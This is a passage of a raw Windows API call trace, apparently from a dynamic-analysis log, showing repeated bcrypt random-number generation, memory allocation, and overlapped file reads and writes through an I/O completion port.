lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0197.890] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0197.890] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0197.890] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0197.891] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0197.891] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0197.891] free (_Block=0x3e305b8) [0197.891] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0197.891] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0197.891] free (_Block=0x1fa91d0) [0197.891] free (_Block=0x1fa2ed8) [0197.891] free (_Block=0x1fa90b8) [0197.891] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0197.892] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.072] WriteFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToWrite=0x29f0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 0x0 [0199.083] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.146] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.146] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.146] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0199.147] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.147] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.147] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0199.147] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.147] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.147] free (_Block=0x3e305b8) [0199.147] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.147] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.148] free (_Block=0x1fa91d0) [0199.148] free (_Block=0x1fa2ed8) [0199.148] free (_Block=0x1fa90b8) [0199.148] WriteFile (in: hFile=0x330, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0199.148] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.224] WriteFile (in: hFile=0x330, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x27c0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0199.224] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.225] CloseHandle (hObject=0x330) returned 1 [0199.225] free (_Block=0x1ff1e60) [0199.226] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.233] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.233] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.233] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0199.233] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.234] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.234] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0199.234] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.234] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.234] free (_Block=0x3e305b8) [0199.234] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.234] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.235] free (_Block=0x1fa91d0) [0199.235] free (_Block=0x1fa2ed8) [0199.235] free (_Block=0x1fa90b8) [0199.235] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0199.235] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.236] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1980, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0199.236] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.236] CloseHandle (hObject=0x330) returned 1 [0199.236] free (_Block=0x3df0008) [0199.236] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.245] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.245] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.245] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0199.245] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.245] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.245] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0199.246] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.246] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.246] free (_Block=0x3e305b8) [0199.246] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.246] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.246] free (_Block=0x1fa91d0) [0199.246] free (_Block=0x1fa2ed8) [0199.246] free (_Block=0x1fa90b8) [0199.246] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61a, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0199.246] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.247] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x19b0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0199.247] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.248] CloseHandle (hObject=0x330) returned 1 [0199.248] free (_Block=0x3df0008) [0199.248] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.255] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.256] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.256] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0199.256] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.256] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.256] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0199.256] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.256] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.256] free (_Block=0x3e305b8) [0199.256] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.256] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.257] free (_Block=0x1fa91d0) [0199.257] free (_Block=0x1fa2ed8) [0199.257] free (_Block=0x1fa90b8) [0199.257] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0199.257] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.258] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x1640, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0199.258] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.267] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x23b6, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0199.279] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.294] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x62c8, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0199.295] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.307] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1310, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0199.308] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.308] CloseHandle (hObject=0x330) returned 1 [0199.309] free (_Block=0x3df0008) [0199.309] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.337] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.338] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0199.338] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.338] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.338] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0199.339] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.339] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.339] free (_Block=0x3e305b8) [0199.339] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.339] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.339] free (_Block=0x1fa91d0) [0199.339] free (_Block=0x1fa2ed8) [0199.339] free (_Block=0x1fa90b8) [0199.339] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61e, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0199.340] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.341] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x4330, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0199.341] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.368] ReadFile (in: hFile=0x330, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x3465, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0199.376] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.389] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.389] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.389] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0199.389] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.390] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.390] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0199.390] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.390] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.390] free (_Block=0x3e305b8) [0199.390] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.390] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.391] free (_Block=0x1fa91d0) [0199.391] free (_Block=0x1fa2ed8) [0199.391] free (_Block=0x1fa90b8) [0199.391] WriteFile (in: hFile=0x3cc, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0199.391] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.403] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.403] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.403] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0199.403] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.404] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.404] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0199.404] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.404] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.404] free (_Block=0x3e305b8) [0199.404] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.404] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.405] free (_Block=0x1fa91d0) [0199.405] free (_Block=0x1fa2ed8) [0199.405] free (_Block=0x1fa90b8) [0199.405] WriteFile (in: hFile=0x2a4, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0199.405] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.416] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.416] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0199.416] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.416] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.416] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0199.417] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.417] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.417] free (_Block=0x3e305b8) [0199.417] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.417] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.417] free (_Block=0x1fa91d0) [0199.417] free (_Block=0x1fa2ed8) [0199.417] free (_Block=0x1fa90b8) [0199.417] WriteFile (in: hFile=0x338, lpBuffer=0x3e7003c, nNumberOfBytesToWrite=0x612, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 0x0 [0199.417] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.423] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.424] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.424] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0199.424] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.424] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.424] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0199.424] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.425] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.425] free (_Block=0x3e305b8) [0199.425] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.425] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.425] free (_Block=0x1fa91d0) [0199.425] free (_Block=0x1fa2ed8) [0199.425] free (_Block=0x1fa90b8) [0199.425] WriteFile (in: hFile=0x330, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x616, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0199.425] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.453] CloseHandle (hObject=0x330) returned 1 [0199.453] free (_Block=0x3df0008) [0199.453] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.531] WriteFile (in: hFile=0x308, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x5af0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0199.531] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.538] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.538] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.538] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2e6fc30) returned 0x0 [0199.538] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0199.539] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0199.539] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2e6f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x2e6f970) returned 0x0 [0199.539] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0199.539] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0199.539] free (_Block=0x3e305b8) [0199.539] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0199.539] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0199.539] free (_Block=0x1fa91d0) [0199.539] free (_Block=0x1fa2ed8) [0199.539] free (_Block=0x1fa90b8) [0199.539] WriteFile (in: hFile=0x2a4, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0199.540] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x2e6fc0c, lpCompletionKey=0x2e6fc1c, lpOverlapped=0x2e6fc18) returned 1 [0199.553] CloseHandle (hObject=0x3cc) returned 1 [0199.554] free (_Block=0x3d70450) [0199.554] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x2e6fc0c, 